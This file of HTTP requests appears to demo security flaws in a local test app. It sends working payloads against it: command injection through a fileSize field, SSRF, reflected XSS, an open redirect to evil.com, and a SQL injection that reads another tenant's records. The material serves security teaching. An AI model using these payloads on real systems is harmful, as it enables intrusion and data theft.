
## Vulnerability demo: Command Injection 

### ✅ All Systems Go 

// Send a POST request with a JSON body to the specified URL
// This is a safe request to a local server

POST http://localhost:6000/cloudpawnery/image
    ?tenantID=3971533981712
    &fileID=fid-1f8b6b1e-1f8b-4b1e-8b6b-1e4b1e8b6b1e
    &fileSize=180
Content-Type: application/json

{}

### ⚠️ Careful Now: Can we do Command Injection?
// Send a POST request with a JSON body to the specified URL
// This is a safe request to a local server

POST http://localhost:6000/cloudpawnery/image
    ?tenantID=3971533981712
    &fileID=fid-1f8b6b1e-1f8b-4b1e-8b6b-1e4b1e8b6b1e
    &fileSize=;touch /tmp/hello #
Content-Type: application/json

{}

### ❌ Careful Now: Command Injection
// Send a POST request with a JSON body to the specified URL
// This is a safe request to a local server

POST http://localhost:6000/cloudpawnery/image
    ?tenantID=3971533981712
    &fileID=fid-1f8b6b1e-1f8b-4b1e-8b6b-1e4b1e8b6b1e
    &fileSize=%3Btouch%20%2Ftmp%2Fhello%20%23
Content-Type: application/json

{}

## Vulnerability demo: SSRF

### ❌ Careful Now: SSRF
// Send a POST request with a JSON body to the specified URL
// This is a safe request to a local server

POST http://localhost:6000/cloudpawnery/image
    ?tenantID=:abc@example.com/app.json?url=
    &fileID=fid-1f8b6b1e-1f8b-4b1e-8b6b-1e4b1e8b6b1e
    &fileSize=;touch /tmp/hello #
Content-Type: application/json

{}


## Vulnerability demo: XSS

### ⚠️ Careful Now: XSS ... ?

GET http://localhost:6000/welcome
Content-Type: application/html

{}

### ❌ Careful Now: XSS by opting into custom response write

GET http://localhost:6000/welcome
    ?lastname=gibson<script>alert(1)</script>
Content-Type: application/html

{}

## Vulnerability demo: Open Redirect

### ❌ Careful Now: Open Redirect

GET http://localhost:6000/cloudpawnery/user
    ?userId=1
    &redirectPage=http://evil.com

## Vulnerability demo: SQL Injection


### ✅ All Systems Go

GET http://localhost:6000/cloudpawnery/image
    ?tenantID=3971533981712
Content-Type: application/json

### ❌ Careful Now: SQL Injection

#### We first create another entry belonging to a different tenant id:

POST http://localhost:6000/cloudpawnery/image
    ?tenantID=432423
    &fileID=fid-1f8b6b1e-1f8b-4b1e-8b6b-1e4b1e8b6b1e
    &fileSize=180
Content-Type: application/json

{}

#### Now we can show how SQL injection works by requesting multiple records

GET http://localhost:6000/cloudpawnery/image
    ?tenantID=3971533981712' OR tenant_id='432423
Content-Type: application/json